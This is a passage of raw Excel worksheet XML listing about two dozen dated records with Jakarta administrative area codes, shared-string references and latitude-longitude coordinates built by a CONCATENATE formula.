      </c>
      <c r="M638">
        <v>3172090001</v>
      </c>
      <c r="N638">
        <v>3172090</v>
      </c>
      <c r="O638">
        <v>3172</v>
      </c>
      <c r="P638">
        <v>31</v>
      </c>
      <c r="Q638" t="s">
        <v>2681</v>
      </c>
      <c r="R638" t="s">
        <v>890</v>
      </c>
      <c r="S638" t="s">
        <v>49</v>
      </c>
      <c r="T638" t="s">
        <v>33</v>
      </c>
      <c r="U638" s="5">
        <v>10687649</v>
      </c>
      <c r="V638" s="5" t="s">
        <v>15045</v>
      </c>
      <c r="W638" s="5">
        <v>-620731</v>
      </c>
      <c r="X638" t="s">
        <v>18851</v>
      </c>
      <c r="Y638" t="str">
        <f t="shared" si="9"/>
        <v>-6.20731,106.87649</v>
      </c>
    </row>
    <row r="639" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A639">
        <v>109513</v>
      </c>
      <c r="B639" s="1">
        <v>43877</v>
      </c>
      <c r="C639">
        <v>1</v>
      </c>
      <c r="D639" t="s">
        <v>2648</v>
      </c>
      <c r="E639" t="s">
        <v>23</v>
      </c>
      <c r="G639" t="s">
        <v>2701</v>
      </c>
      <c r="H639" t="s">
        <v>26</v>
      </c>
      <c r="J639" t="s">
        <v>2702</v>
      </c>
      <c r="L639" t="s">
        <v>2703</v>
      </c>
      <c r="M639">
        <v>3175010005</v>
      </c>
      <c r="N639">
        <v>3175010</v>
      </c>
      <c r="O639">
        <v>3175</v>
      </c>
      <c r="P639">
        <v>31</v>
      </c>
      <c r="Q639" t="s">
        <v>1686</v>
      </c>
      <c r="R639" t="s">
        <v>546</v>
      </c>
      <c r="S639" t="s">
        <v>547</v>
      </c>
      <c r="T639" t="s">
        <v>33</v>
      </c>
      <c r="U639" s="5">
        <v>10679676</v>
      </c>
      <c r="V639" s="5" t="s">
        <v>15046</v>
      </c>
      <c r="W639" s="5">
        <v>-611060</v>
      </c>
      <c r="X639" t="s">
        <v>18852</v>
      </c>
      <c r="Y639" t="str">
        <f t="shared" si="9"/>
        <v>-6.11060,106.79676</v>
      </c>
    </row>
    <row r="640" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A640">
        <v>109514</v>
      </c>
      <c r="B640" s="1">
        <v>43877</v>
      </c>
      <c r="C640">
        <v>1</v>
      </c>
      <c r="D640" t="s">
        <v>2648</v>
      </c>
      <c r="E640" t="s">
        <v>23</v>
      </c>
      <c r="G640" t="s">
        <v>2704</v>
      </c>
      <c r="H640" t="s">
        <v>26</v>
      </c>
      <c r="J640" t="s">
        <v>2705</v>
      </c>
      <c r="L640" t="s">
        <v>2706</v>
      </c>
      <c r="M640">
        <v>3172090006</v>
      </c>
      <c r="N640">
        <v>3172090</v>
      </c>
      <c r="O640">
        <v>3172</v>
      </c>
      <c r="P640">
        <v>31</v>
      </c>
      <c r="Q640" t="s">
        <v>2283</v>
      </c>
      <c r="R640" t="s">
        <v>890</v>
      </c>
      <c r="S640" t="s">
        <v>49</v>
      </c>
      <c r="T640" t="s">
        <v>33</v>
      </c>
      <c r="U640" s="5">
        <v>10687840</v>
      </c>
      <c r="V640" s="5" t="s">
        <v>15047</v>
      </c>
      <c r="W640" s="5">
        <v>-616780</v>
      </c>
      <c r="X640" t="s">
        <v>18853</v>
      </c>
      <c r="Y640" t="str">
        <f t="shared" si="9"/>
        <v>-6.16780,106.87840</v>
      </c>
    </row>
    <row r="641" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A641">
        <v>109515</v>
      </c>
      <c r="B641" s="1">
        <v>43877</v>
      </c>
      <c r="C641">
        <v>1</v>
      </c>
      <c r="D641" t="s">
        <v>2648</v>
      </c>
      <c r="E641" t="s">
        <v>23</v>
      </c>
      <c r="G641" t="s">
        <v>2707</v>
      </c>
      <c r="H641" t="s">
        <v>26</v>
      </c>
      <c r="J641" t="s">
        <v>2708</v>
      </c>
      <c r="L641" t="s">
        <v>2709</v>
      </c>
      <c r="M641">
        <v>3173070002</v>
      </c>
      <c r="N641">
        <v>3173070</v>
      </c>
      <c r="O641">
        <v>3173</v>
      </c>
      <c r="P641">
        <v>31</v>
      </c>
      <c r="Q641" t="s">
        <v>2710</v>
      </c>
      <c r="R641" t="s">
        <v>323</v>
      </c>
      <c r="S641" t="s">
        <v>62</v>
      </c>
      <c r="T641" t="s">
        <v>33</v>
      </c>
      <c r="U641" s="5">
        <v>10683902</v>
      </c>
      <c r="V641" s="5" t="s">
        <v>15048</v>
      </c>
      <c r="W641" s="5">
        <v>-615650</v>
      </c>
      <c r="X641" t="s">
        <v>18854</v>
      </c>
      <c r="Y641" t="str">
        <f t="shared" si="9"/>
        <v>-6.15650,106.83902</v>
      </c>
    </row>
    <row r="642" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A642">
        <v>109516</v>
      </c>
      <c r="B642" s="1">
        <v>43877</v>
      </c>
      <c r="C642">
        <v>1</v>
      </c>
      <c r="D642" t="s">
        <v>2648</v>
      </c>
      <c r="E642" t="s">
        <v>23</v>
      </c>
      <c r="G642" t="s">
        <v>2711</v>
      </c>
      <c r="H642" t="s">
        <v>26</v>
      </c>
      <c r="J642" t="s">
        <v>2712</v>
      </c>
      <c r="L642" t="s">
        <v>2713</v>
      </c>
      <c r="M642">
        <v>3175020003</v>
      </c>
      <c r="N642">
        <v>3175020</v>
      </c>
      <c r="O642">
        <v>3175</v>
      </c>
      <c r="P642">
        <v>31</v>
      </c>
      <c r="Q642" t="s">
        <v>2667</v>
      </c>
      <c r="R642" t="s">
        <v>2228</v>
      </c>
      <c r="S642" t="s">
        <v>547</v>
      </c>
      <c r="T642" t="s">
        <v>33</v>
      </c>
      <c r="U642" s="5">
        <v>10683089</v>
      </c>
      <c r="V642" s="5" t="s">
        <v>15049</v>
      </c>
      <c r="W642" s="5">
        <v>-613334</v>
      </c>
      <c r="X642" t="s">
        <v>18855</v>
      </c>
      <c r="Y642" t="str">
        <f t="shared" si="9"/>
        <v>-6.13334,106.83089</v>
      </c>
    </row>
    <row r="643" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A643">
        <v>109517</v>
      </c>
      <c r="B643" s="1">
        <v>43877</v>
      </c>
      <c r="C643">
        <v>1</v>
      </c>
      <c r="D643" t="s">
        <v>2648</v>
      </c>
      <c r="E643" t="s">
        <v>23</v>
      </c>
      <c r="G643" t="s">
        <v>2714</v>
      </c>
      <c r="H643" t="s">
        <v>26</v>
      </c>
      <c r="J643" t="s">
        <v>2715</v>
      </c>
      <c r="L643" t="s">
        <v>2716</v>
      </c>
      <c r="M643">
        <v>3172050004</v>
      </c>
      <c r="N643">
        <v>3172050</v>
      </c>
      <c r="O643">
        <v>3172</v>
      </c>
      <c r="P643">
        <v>31</v>
      </c>
      <c r="Q643" t="s">
        <v>2717</v>
      </c>
      <c r="R643" t="s">
        <v>358</v>
      </c>
      <c r="S643" t="s">
        <v>49</v>
      </c>
      <c r="T643" t="s">
        <v>33</v>
      </c>
      <c r="U643" s="5">
        <v>10687569</v>
      </c>
      <c r="V643" s="5" t="s">
        <v>15050</v>
      </c>
      <c r="W643" s="5">
        <v>-630136</v>
      </c>
      <c r="X643" t="s">
        <v>18856</v>
      </c>
      <c r="Y643" t="str">
        <f t="shared" ref="Y643:Y706" si="10">CONCATENATE(X643,",",V643)</f>
        <v>-6.30136,106.87569</v>
      </c>
    </row>
    <row r="644" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A644">
        <v>109518</v>
      </c>
      <c r="B644" s="1">
        <v>43877</v>
      </c>
      <c r="C644">
        <v>1</v>
      </c>
      <c r="D644" t="s">
        <v>2648</v>
      </c>
      <c r="E644" t="s">
        <v>23</v>
      </c>
      <c r="G644" t="s">
        <v>2718</v>
      </c>
      <c r="H644" t="s">
        <v>26</v>
      </c>
      <c r="J644" t="s">
        <v>2719</v>
      </c>
      <c r="L644" t="s">
        <v>2720</v>
      </c>
      <c r="M644">
        <v>3175050003</v>
      </c>
      <c r="N644">
        <v>3175050</v>
      </c>
      <c r="O644">
        <v>3175</v>
      </c>
      <c r="P644">
        <v>31</v>
      </c>
      <c r="Q644" t="s">
        <v>1740</v>
      </c>
      <c r="R644" t="s">
        <v>1013</v>
      </c>
      <c r="S644" t="s">
        <v>547</v>
      </c>
      <c r="T644" t="s">
        <v>33</v>
      </c>
      <c r="U644" s="5">
        <v>10691028</v>
      </c>
      <c r="V644" s="5" t="s">
        <v>15051</v>
      </c>
      <c r="W644" s="5">
        <v>-616742</v>
      </c>
      <c r="X644" t="s">
        <v>18857</v>
      </c>
      <c r="Y644" t="str">
        <f t="shared" si="10"/>
        <v>-6.16742,106.91028</v>
      </c>
    </row>
    <row r="645" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A645">
        <v>109519</v>
      </c>
      <c r="B645" s="1">
        <v>43877</v>
      </c>
      <c r="C645">
        <v>1</v>
      </c>
      <c r="D645" t="s">
        <v>2648</v>
      </c>
      <c r="E645" t="s">
        <v>23</v>
      </c>
      <c r="G645" t="s">
        <v>2721</v>
      </c>
      <c r="H645" t="s">
        <v>26</v>
      </c>
      <c r="J645" t="s">
        <v>2722</v>
      </c>
      <c r="L645" t="s">
        <v>2723</v>
      </c>
      <c r="M645">
        <v>3173010003</v>
      </c>
      <c r="N645">
        <v>3173010</v>
      </c>
      <c r="O645">
        <v>3173</v>
      </c>
      <c r="P645">
        <v>31</v>
      </c>
      <c r="Q645" t="s">
        <v>2338</v>
      </c>
      <c r="R645" t="s">
        <v>1481</v>
      </c>
      <c r="S645" t="s">
        <v>62</v>
      </c>
      <c r="T645" t="s">
        <v>33</v>
      </c>
      <c r="U645" s="5">
        <v>10681233</v>
      </c>
      <c r="V645" s="5" t="s">
        <v>15052</v>
      </c>
      <c r="W645" s="5">
        <v>-620536</v>
      </c>
      <c r="X645" t="s">
        <v>18858</v>
      </c>
      <c r="Y645" t="str">
        <f t="shared" si="10"/>
        <v>-6.20536,106.81233</v>
      </c>
    </row>
    <row r="646" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A646">
        <v>109520</v>
      </c>
      <c r="B646" s="1">
        <v>43877</v>
      </c>
      <c r="C646">
        <v>1</v>
      </c>
      <c r="D646" t="s">
        <v>2648</v>
      </c>
      <c r="E646" t="s">
        <v>23</v>
      </c>
      <c r="G646" t="s">
        <v>2724</v>
      </c>
      <c r="H646" t="s">
        <v>26</v>
      </c>
      <c r="J646" t="s">
        <v>2725</v>
      </c>
      <c r="L646" t="s">
        <v>2726</v>
      </c>
      <c r="M646">
        <v>3172100006</v>
      </c>
      <c r="N646">
        <v>3172100</v>
      </c>
      <c r="O646">
        <v>3172</v>
      </c>
      <c r="P646">
        <v>31</v>
      </c>
      <c r="Q646" t="s">
        <v>1435</v>
      </c>
      <c r="R646" t="s">
        <v>1436</v>
      </c>
      <c r="S646" t="s">
        <v>49</v>
      </c>
      <c r="T646" t="s">
        <v>33</v>
      </c>
      <c r="U646" s="5">
        <v>10687161</v>
      </c>
      <c r="V646" s="5" t="s">
        <v>15053</v>
      </c>
      <c r="W646" s="5">
        <v>-619817</v>
      </c>
      <c r="X646" t="s">
        <v>18859</v>
      </c>
      <c r="Y646" t="str">
        <f t="shared" si="10"/>
        <v>-6.19817,106.87161</v>
      </c>
    </row>
    <row r="647" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A647">
        <v>109521</v>
      </c>
      <c r="B647" s="1">
        <v>43877</v>
      </c>
      <c r="C647">
        <v>1</v>
      </c>
      <c r="D647" t="s">
        <v>2648</v>
      </c>
      <c r="E647" t="s">
        <v>23</v>
      </c>
      <c r="G647" t="s">
        <v>2727</v>
      </c>
      <c r="H647" t="s">
        <v>26</v>
      </c>
      <c r="J647" t="s">
        <v>2728</v>
      </c>
      <c r="L647" t="s">
        <v>2729</v>
      </c>
      <c r="M647">
        <v>3175040002</v>
      </c>
      <c r="N647">
        <v>3175040</v>
      </c>
      <c r="O647">
        <v>3175</v>
      </c>
      <c r="P647">
        <v>31</v>
      </c>
      <c r="Q647" t="s">
        <v>2730</v>
      </c>
      <c r="R647" t="s">
        <v>2063</v>
      </c>
      <c r="S647" t="s">
        <v>547</v>
      </c>
      <c r="T647" t="s">
        <v>33</v>
      </c>
      <c r="U647" s="5">
        <v>10690444</v>
      </c>
      <c r="V647" s="5" t="s">
        <v>15054</v>
      </c>
      <c r="W647" s="5">
        <v>-613875</v>
      </c>
      <c r="X647" t="s">
        <v>18860</v>
      </c>
      <c r="Y647" t="str">
        <f t="shared" si="10"/>
        <v>-6.13875,106.90444</v>
      </c>
    </row>
    <row r="648" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A648">
        <v>109522</v>
      </c>
      <c r="B648" s="1">
        <v>43877</v>
      </c>
      <c r="C648">
        <v>1</v>
      </c>
      <c r="D648" t="s">
        <v>2648</v>
      </c>
      <c r="E648" t="s">
        <v>23</v>
      </c>
      <c r="G648" t="s">
        <v>2731</v>
      </c>
      <c r="H648" t="s">
        <v>26</v>
      </c>
      <c r="J648" t="s">
        <v>2705</v>
      </c>
      <c r="L648" t="s">
        <v>2732</v>
      </c>
      <c r="M648">
        <v>3172090006</v>
      </c>
      <c r="N648">
        <v>3172090</v>
      </c>
      <c r="O648">
        <v>3172</v>
      </c>
      <c r="P648">
        <v>31</v>
      </c>
      <c r="Q648" t="s">
        <v>2283</v>
      </c>
      <c r="R648" t="s">
        <v>890</v>
      </c>
      <c r="S648" t="s">
        <v>49</v>
      </c>
      <c r="T648" t="s">
        <v>33</v>
      </c>
      <c r="U648" s="5">
        <v>10687771</v>
      </c>
      <c r="V648" s="5" t="s">
        <v>15055</v>
      </c>
      <c r="W648" s="5">
        <v>-616999</v>
      </c>
      <c r="X648" t="s">
        <v>18861</v>
      </c>
      <c r="Y648" t="str">
        <f t="shared" si="10"/>
        <v>-6.16999,106.87771</v>
      </c>
    </row>
    <row r="649" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A649">
        <v>109523</v>
      </c>
      <c r="B649" s="1">
        <v>43877</v>
      </c>
      <c r="C649">
        <v>1</v>
      </c>
      <c r="D649" t="s">
        <v>2648</v>
      </c>
      <c r="E649" t="s">
        <v>23</v>
      </c>
      <c r="G649" t="s">
        <v>2733</v>
      </c>
      <c r="H649" t="s">
        <v>26</v>
      </c>
      <c r="J649" t="s">
        <v>2715</v>
      </c>
      <c r="L649" t="s">
        <v>2716</v>
      </c>
      <c r="M649">
        <v>3172050004</v>
      </c>
      <c r="N649">
        <v>3172050</v>
      </c>
      <c r="O649">
        <v>3172</v>
      </c>
      <c r="P649">
        <v>31</v>
      </c>
      <c r="Q649" t="s">
        <v>2717</v>
      </c>
      <c r="R649" t="s">
        <v>358</v>
      </c>
      <c r="S649" t="s">
        <v>49</v>
      </c>
      <c r="T649" t="s">
        <v>33</v>
      </c>
      <c r="U649" s="5">
        <v>10687569</v>
      </c>
      <c r="V649" s="5" t="s">
        <v>15050</v>
      </c>
      <c r="W649" s="5">
        <v>-630133</v>
      </c>
      <c r="X649" t="s">
        <v>18862</v>
      </c>
      <c r="Y649" t="str">
        <f t="shared" si="10"/>
        <v>-6.30133,106.87569</v>
      </c>
    </row>
    <row r="650" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A650">
        <v>109524</v>
      </c>
      <c r="B650" s="1">
        <v>43877</v>
      </c>
      <c r="C650">
        <v>1</v>
      </c>
      <c r="D650" t="s">
        <v>2648</v>
      </c>
      <c r="E650" t="s">
        <v>23</v>
      </c>
      <c r="G650" t="s">
        <v>2734</v>
      </c>
      <c r="H650" t="s">
        <v>26</v>
      </c>
      <c r="J650" t="s">
        <v>1590</v>
      </c>
      <c r="L650" t="s">
        <v>2735</v>
      </c>
      <c r="M650">
        <v>3175050001</v>
      </c>
      <c r="N650">
        <v>3175050</v>
      </c>
      <c r="O650">
        <v>3175</v>
      </c>
      <c r="P650">
        <v>31</v>
      </c>
      <c r="Q650" t="s">
        <v>1037</v>
      </c>
      <c r="R650" t="s">
        <v>1013</v>
      </c>
      <c r="S650" t="s">
        <v>547</v>
      </c>
      <c r="T650" t="s">
        <v>33</v>
      </c>
      <c r="U650" s="5">
        <v>10688753</v>
      </c>
      <c r="V650" s="5" t="s">
        <v>15056</v>
      </c>
      <c r="W650" s="5">
        <v>-615258</v>
      </c>
      <c r="X650" t="s">
        <v>18863</v>
      </c>
      <c r="Y650" t="str">
        <f t="shared" si="10"/>
        <v>-6.15258,106.88753</v>
      </c>
    </row>
    <row r="651" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A651">
        <v>109525</v>
      </c>
      <c r="B651" s="1">
        <v>43877</v>
      </c>
      <c r="C651">
        <v>1</v>
      </c>
      <c r="D651" t="s">
        <v>2648</v>
      </c>
      <c r="E651" t="s">
        <v>23</v>
      </c>
      <c r="G651" t="s">
        <v>2736</v>
      </c>
      <c r="H651" t="s">
        <v>26</v>
      </c>
      <c r="J651" t="s">
        <v>2737</v>
      </c>
      <c r="L651" t="s">
        <v>2738</v>
      </c>
      <c r="M651">
        <v>3173040001</v>
      </c>
      <c r="N651">
        <v>3173040</v>
      </c>
      <c r="O651">
        <v>3173</v>
      </c>
      <c r="P651">
        <v>31</v>
      </c>
      <c r="Q651" t="s">
        <v>1598</v>
      </c>
      <c r="R651" t="s">
        <v>1598</v>
      </c>
      <c r="S651" t="s">
        <v>62</v>
      </c>
      <c r="T651" t="s">
        <v>33</v>
      </c>
      <c r="U651" s="5">
        <v>10685564</v>
      </c>
      <c r="V651" s="5" t="s">
        <v>15057</v>
      </c>
      <c r="W651" s="5">
        <v>-618839</v>
      </c>
      <c r="X651" t="s">
        <v>18864</v>
      </c>
      <c r="Y651" t="str">
        <f t="shared" si="10"/>
        <v>-6.18839,106.85564</v>
      </c>
    </row>
    <row r="652" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A652">
        <v>109526</v>
      </c>
      <c r="B652" s="1">
        <v>43877</v>
      </c>
      <c r="C652">
        <v>1</v>
      </c>
      <c r="D652" t="s">
        <v>2648</v>
      </c>
      <c r="E652" t="s">
        <v>23</v>
      </c>
      <c r="G652" t="s">
        <v>2739</v>
      </c>
      <c r="H652" t="s">
        <v>26</v>
      </c>
      <c r="J652" t="s">
        <v>2740</v>
      </c>
      <c r="L652" t="s">
        <v>2741</v>
      </c>
      <c r="M652">
        <v>3173070003</v>
      </c>
      <c r="N652">
        <v>3173070</v>
      </c>
      <c r="O652">
        <v>3173</v>
      </c>
      <c r="P652">
        <v>31</v>
      </c>
      <c r="Q652" t="s">
        <v>520</v>
      </c>
      <c r="R652" t="s">
        <v>323</v>
      </c>
      <c r="S652" t="s">
        <v>62</v>
      </c>
      <c r="T652" t="s">
        <v>33</v>
      </c>
      <c r="U652" s="5">
        <v>10683377</v>
      </c>
      <c r="V652" s="5" t="s">
        <v>15058</v>
      </c>
      <c r="W652" s="5">
        <v>-615223</v>
      </c>
      <c r="X652" t="s">
        <v>18759</v>
      </c>
      <c r="Y652" t="str">
        <f t="shared" si="10"/>
        <v>-6.15223,106.83377</v>
      </c>
    </row>
    <row r="653" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A653">
        <v>109527</v>
      </c>
      <c r="B653" s="1">
        <v>43877</v>
      </c>
      <c r="C653">
        <v>1</v>
      </c>
      <c r="D653" t="s">
        <v>2648</v>
      </c>
      <c r="E653" t="s">
        <v>23</v>
      </c>
      <c r="G653" t="s">
        <v>2742</v>
      </c>
      <c r="H653" t="s">
        <v>26</v>
      </c>
      <c r="J653" t="s">
        <v>1590</v>
      </c>
      <c r="L653" t="s">
        <v>2743</v>
      </c>
      <c r="M653">
        <v>3175030002</v>
      </c>
      <c r="N653">
        <v>3175030</v>
      </c>
      <c r="O653">
        <v>3175</v>
      </c>
      <c r="P653">
        <v>31</v>
      </c>
      <c r="Q653" t="s">
        <v>1592</v>
      </c>
      <c r="R653" t="s">
        <v>1563</v>
      </c>
      <c r="S653" t="s">
        <v>547</v>
      </c>
      <c r="T653" t="s">
        <v>33</v>
      </c>
      <c r="U653" s="5">
        <v>10688834</v>
      </c>
      <c r="V653" s="5" t="s">
        <v>15059</v>
      </c>
      <c r="W653" s="5">
        <v>-615033</v>
      </c>
      <c r="X653" t="s">
        <v>18865</v>
      </c>
      <c r="Y653" t="str">
        <f t="shared" si="10"/>
        <v>-6.15033,106.88834</v>
      </c>
    </row>
    <row r="654" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A654">
        <v>109528</v>
      </c>
      <c r="B654" s="1">
        <v>43877</v>
      </c>
      <c r="C654">
        <v>1</v>
      </c>
      <c r="D654" t="s">
        <v>2648</v>
      </c>
      <c r="E654" t="s">
        <v>23</v>
      </c>
      <c r="G654" t="s">
        <v>2744</v>
      </c>
      <c r="H654" t="s">
        <v>26</v>
      </c>
      <c r="J654" t="s">
        <v>1605</v>
      </c>
      <c r="L654" t="s">
        <v>2745</v>
      </c>
      <c r="M654">
        <v>3174040007</v>
      </c>
      <c r="N654">
        <v>3174040</v>
      </c>
      <c r="O654">
        <v>3174</v>
      </c>
      <c r="P654">
        <v>31</v>
      </c>
      <c r="Q654" t="s">
        <v>389</v>
      </c>
      <c r="R654" t="s">
        <v>377</v>
      </c>
      <c r="S654" t="s">
        <v>32</v>
      </c>
      <c r="T654" t="s">
        <v>33</v>
      </c>
      <c r="U654" s="5">
        <v>10678580</v>
      </c>
      <c r="V654" s="5" t="s">
        <v>15060</v>
      </c>
      <c r="W654" s="5">
        <v>-614594</v>
      </c>
      <c r="X654" t="s">
        <v>18866</v>
      </c>
      <c r="Y654" t="str">
        <f t="shared" si="10"/>
        <v>-6.14594,106.78580</v>
      </c>
    </row>
    <row r="655" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A655">
        <v>109529</v>
      </c>
      <c r="B655" s="1">
        <v>43877</v>
      </c>
      <c r="C655">
        <v>1</v>
      </c>
      <c r="D655" t="s">
        <v>2648</v>
      </c>
      <c r="E655" t="s">
        <v>23</v>
      </c>
      <c r="G655" t="s">
        <v>2746</v>
      </c>
      <c r="H655" t="s">
        <v>26</v>
      </c>
      <c r="J655" t="s">
        <v>2747</v>
      </c>
      <c r="L655" t="s">
        <v>2748</v>
      </c>
      <c r="M655">
        <v>3172090005</v>
      </c>
      <c r="N655">
        <v>3172090</v>
      </c>
      <c r="O655">
        <v>3172</v>
      </c>
      <c r="P655">
        <v>31</v>
      </c>
      <c r="Q655" t="s">
        <v>2749</v>
      </c>
      <c r="R655" t="s">
        <v>890</v>
      </c>
      <c r="S655" t="s">
        <v>49</v>
      </c>
      <c r="T655" t="s">
        <v>33</v>
      </c>
      <c r="U655" s="5">
        <v>10688054</v>
      </c>
      <c r="V655" s="5" t="s">
        <v>15061</v>
      </c>
      <c r="W655" s="5">
        <v>-619593</v>
      </c>
      <c r="X655" t="s">
        <v>18867</v>
      </c>
      <c r="Y655" t="str">
        <f t="shared" si="10"/>
        <v>-6.19593,106.88054</v>
      </c>
    </row>
    <row r="656" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A656">
        <v>109530</v>
      </c>
      <c r="B656" s="1">
        <v>43877</v>
      </c>
      <c r="C656">
        <v>1</v>
      </c>
      <c r="D656" t="s">
        <v>2648</v>
      </c>
      <c r="E656" t="s">
        <v>23</v>
      </c>
      <c r="G656" t="s">
        <v>2750</v>
      </c>
      <c r="H656" t="s">
        <v>26</v>
      </c>
      <c r="J656" t="s">
        <v>2737</v>
      </c>
      <c r="L656" t="s">
        <v>2751</v>
      </c>
      <c r="M656">
        <v>3173040001</v>
      </c>
      <c r="N656">
        <v>3173040</v>
      </c>
      <c r="O656">
        <v>3173</v>
      </c>
      <c r="P656">
        <v>31</v>
      </c>
      <c r="Q656" t="s">
        <v>1598</v>
      </c>
      <c r="R656" t="s">
        <v>1598</v>
      </c>
      <c r="S656" t="s">
        <v>62</v>
      </c>
      <c r="T656" t="s">
        <v>33</v>
      </c>
      <c r="U656" s="5">
        <v>10685565</v>
      </c>
      <c r="V656" s="5" t="s">
        <v>15062</v>
      </c>
      <c r="W656" s="5">
        <v>-618838</v>
      </c>
      <c r="X656" t="s">
        <v>18868</v>
      </c>
      <c r="Y656" t="str">
        <f t="shared" si="10"/>
        <v>-6.18838,106.85565</v>
      </c>
    </row>
    <row r="657" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A657">
        <v>109531</v>
      </c>
      <c r="B657" s="1">
        <v>43877</v>
      </c>
      <c r="C657">
        <v>1</v>
      </c>
      <c r="D657" t="s">
        <v>2648</v>
      </c>
      <c r="E657" t="s">
        <v>23</v>
      </c>
      <c r="G657" t="s">
        <v>2752</v>
      </c>
      <c r="H657" t="s">
        <v>26</v>
      </c>
      <c r="J657" t="s">
        <v>2580</v>
      </c>
      <c r="L657" t="s">
        <v>2753</v>
      </c>
      <c r="M657">
        <v>3172040005</v>
      </c>
      <c r="N657">
        <v>3172040</v>
      </c>
      <c r="O657">
        <v>3172</v>
      </c>
      <c r="P657">
        <v>31</v>
      </c>
      <c r="Q657" t="s">
        <v>1351</v>
      </c>
      <c r="R657" t="s">
        <v>281</v>
      </c>
      <c r="S657" t="s">
        <v>49</v>
      </c>
      <c r="T657" t="s">
        <v>33</v>
      </c>
      <c r="U657" s="5">
        <v>10689391</v>
      </c>
      <c r="V657" s="5" t="s">
        <v>15063</v>
      </c>
      <c r="W657" s="5">
        <v>-624123</v>
      </c>
      <c r="X657" t="s">
        <v>18869</v>
      </c>
      <c r="Y657" t="str">
        <f t="shared" si="10"/>
        <v>-6.24123,106.89391</v>
      </c>
    </row>
    <row r="658" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A658">
        <v>109532</v>
      </c>
      <c r="B658" s="1">
        <v>43877</v>
      </c>
      <c r="C658">
        <v>1</v>
      </c>
      <c r="D658" t="s">
        <v>2648</v>
      </c>
      <c r="E658" t="s">
        <v>23</v>
      </c>
      <c r="G658" t="s">
        <v>2754</v>
      </c>
      <c r="H658" t="s">
        <v>26</v>
      </c>
      <c r="J658" t="s">
        <v>2755</v>
      </c>
      <c r="L658" t="s">
        <v>2756</v>
      </c>
      <c r="M658">
        <v>3175050002</v>
      </c>
      <c r="N658">
        <v>3175050</v>
      </c>
      <c r="O658">
        <v>3175</v>
      </c>
      <c r="P658">
        <v>31</v>
      </c>
      <c r="Q658" t="s">
        <v>1012</v>
      </c>
      <c r="R658" t="s">
        <v>1013</v>
      </c>
      <c r="S658" t="s">
        <v>547</v>
      </c>
      <c r="T658" t="s">
        <v>33</v>
      </c>
      <c r="U658" s="5">
        <v>10689909</v>
      </c>
      <c r="V658" s="5" t="s">
        <v>15064</v>
      </c>
      <c r="W658" s="5">
        <v>-617176</v>
      </c>
      <c r="X658" t="s">
        <v>18870</v>
      </c>
      <c r="Y658" t="str">
        <f t="shared" si="10"/>
        <v>-6.17176,106.89909</v>
      </c>
    </row>
    <row r="659" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A659">
        <v>109533</v>
      </c>
      <c r="B659" s="1">
        <v>43877</v>
      </c>
      <c r="C659">
        <v>1</v>
      </c>
      <c r="D659" t="s">
        <v>2648</v>
      </c>
      <c r="E659" t="s">
        <v>23</v>
      </c>
      <c r="G659" t="s">
        <v>2757</v>
      </c>
      <c r="H659" t="s">
        <v>26</v>
      </c>
      <c r="J659" t="s">
        <v>2276</v>
      </c>
      <c r="L659" t="s">
        <v>2758</v>
      </c>
      <c r="M659">
        <v>3175060001</v>
      </c>
      <c r="N659">
        <v>3175060</v>
      </c>
      <c r="O659">
        <v>3175</v>
      </c>
      <c r="P659">
        <v>31</v>
      </c>
      <c r="Q659" t="s">
        <v>2278</v>
      </c>
      <c r="R659" t="s">
        <v>2279</v>
      </c>
      <c r="S659" t="s">
        <v>547</v>
      </c>
      <c r="T659" t="s">
        <v>33</v>
      </c>
      <c r="U659" s="5">
        <v>10692374</v>
      </c>
      <c r="V659" s="5" t="s">
        <v>15065</v>
      </c>
      <c r="W659" s="5">
        <v>-615842</v>
      </c>
      <c r="X659" t="s">
        <v>18871</v>
      </c>
      <c r="Y659" t="str">
        <f t="shared" si="10"/>
        <v>-6.15842,106.92374</v>
      </c>
    </row>
    <row r="660" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A660">
        <v>109534</v>
      </c>
      <c r="B660" s="1">
        <v>43877</v>
      </c>
      <c r="C660">
        <v>1</v>
      </c>
      <c r="D660" t="s">
        <v>2648</v>
      </c>
      <c r="E660" t="s">
        <v>23</v>
      </c>
      <c r="G660" t="s">
        <v>2759</v>
      </c>
      <c r="H660" t="s">
        <v>26</v>
      </c>
      <c r="J660" t="s">
        <v>2661</v>
      </c>
      <c r="L660" t="s">
        <v>2760</v>
      </c>
      <c r="M660">
        <v>3174080005</v>
      </c>
      <c r="N660">
        <v>3174080</v>
      </c>
      <c r="O660">
        <v>3174</v>
      </c>
      <c r="P660">
        <v>31</v>
      </c>
      <c r="Q660" t="s">
        <v>2663</v>
      </c>
      <c r="R660" t="s">
        <v>695</v>
      </c>
      <c r="S660" t="s">
        <v>32</v>
      </c>
      <c r="T660" t="s">
        <v>33</v>
      </c>
      <c r="U660" s="5">
        <v>10671055</v>
      </c>
      <c r="V660" s="5" t="s">
        <v>15066</v>
      </c>
      <c r="W660" s="5">
        <v>-610256</v>
      </c>
      <c r="X660" t="s">
        <v>18872</v>
      </c>
      <c r="Y660" t="str">
        <f t="shared" si="10"/>
        <v>-6.10256,106.71055</v>
      </c>
    </row>
    <row r="661" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A661">
        <v>109535</v>
      </c>
      <c r="B661" s="1">
        <v>43877</v>
      </c>
      <c r="C661">
        <v>1</v>
      </c>
      <c r="D661" t="s">
        <v>2648</v>
      </c>
      <c r="E661" t="s">
        <v>23</v>
      </c>
      <c r="G661" t="s">
        <v>2761</v>
